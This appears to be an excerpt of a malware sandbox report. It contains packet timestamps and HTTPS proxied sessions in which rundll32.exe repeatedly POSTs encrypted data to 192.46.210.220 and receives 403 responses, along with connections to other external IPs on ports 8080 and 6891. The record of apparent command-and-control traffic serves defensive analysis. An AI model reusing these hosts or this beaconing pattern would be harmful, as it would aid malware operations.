                                                                                                          Oct 28, 2021 05:11:09.567442894 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:09.567465067 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:10.279196024 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:10.279268026 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:10.279346943 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:10.279375076 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:10.439702988 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:10.439732075 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:11.096823931 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:11.096880913 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:11.096975088 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:11.114569902 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:11.114626884 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:11.630311966 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:11.630512953 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:11.930865049 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:12.091433048 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.091649055 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:12.102783918 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:12.120419979 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:12.120451927 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.120724916 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.120793104 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:12.123989105 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:12.124080896 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:12.124109983 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.263181925 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.264723063 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.264904976 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:12.834827900 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.834897995 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:12.835005045 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:12.835066080 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:13.916373014 CEST49744443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:13.916407108 CEST44349744192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.434396029 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:14.594832897 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.595158100 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.595237017 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:14.596010923 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:14.596127987 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:14.756262064 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.756284952 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.756293058 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.756303072 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.756310940 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:14.971281052 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.129270077 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.129395962 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.130306959 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.139209032 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.139230013 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.139326096 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.139367104 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.145967007 CEST49745808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.288026094 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.292156935 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.293359041 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.306446075 CEST80849745143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.541333914 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.699318886 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.699495077 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.699592113 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.700320959 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.700437069 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:15.858091116 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.858110905 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.858118057 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:15.858149052 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.235548019 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:16.247450113 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.247478008 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.247606993 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:16.247657061 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:16.251756907 CEST49747808192.168.2.3143.244.140.214
                                                                                                          Oct 28, 2021 05:11:16.401156902 CEST68914974845.77.0.96192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.401407957 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:16.402046919 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:16.409663916 CEST80849747143.244.140.214192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.567358017 CEST68914974845.77.0.96192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.568283081 CEST68914974845.77.0.96192.168.2.3
                                                                                                          Oct 28, 2021 05:11:16.568458080 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:16.886558056 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:17.052285910 CEST68914974845.77.0.96192.168.2.3
                                                                                                          Oct 28, 2021 05:11:17.052531004 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:17.053345919 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:17.053488970 CEST497486891192.168.2.345.77.0.96
                                                                                                          Oct 28, 2021 05:11:17.218718052 CEST68914974845.77.0.96192.168.2.3

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 192.46.210.220

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.349743192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:09 UTC0OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:09 UTC0OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:10 UTC4INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:10 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.349744192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:12 UTC4OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:12 UTC5OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:12 UTC9INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:12 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.349786192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:51 UTC49OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:51 UTC49OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:51 UTC54INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:51 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.349787192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:52 UTC54OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:52 UTC54OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:53 UTC59INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:52 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.349799192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:58 UTC59OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:58 UTC59OUTData Raw: e9 14 ae 38 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: 8#QZK?)D5=>\F[{!@}<60k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:11:59 UTC64INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:11:59 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.349800192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:59 UTC64OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:11:59 UTC64OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:12:00 UTC69INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:12:00 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.349806192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:12:08 UTC69OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:12:08 UTC69OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:12:09 UTC73INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:12:09 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          15192.168.2.349810192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:12:16 UTC74OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:12:16 UTC74OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:12:17 UTC78INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:12:16 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.349823192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:12:24 UTC79OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4802
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:12:24 UTC79OUTData Raw: 0b 5c 98 14 10 0f 23 a1 51 b5 5a a3 4b 3f 1d 93 e5 fb 29 ab ad ff f2 44 04 13 80 c9 dd 06 c4 1c a4 a4 bd 35 3d 0f 83 b2 94 ac fd b9 85 18 c8 dd fe e0 7f 3e 9f 5c 1f 46 5b 7b 88 07 21 40 7d fd 3c fb 93 03 10 fc 36 95 01 ba 8b 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: \#QZK?)D5=>\F[{!@}<60kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:12:25 UTC83INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:12:24 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.349752192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:11:20 UTC9OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4814
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
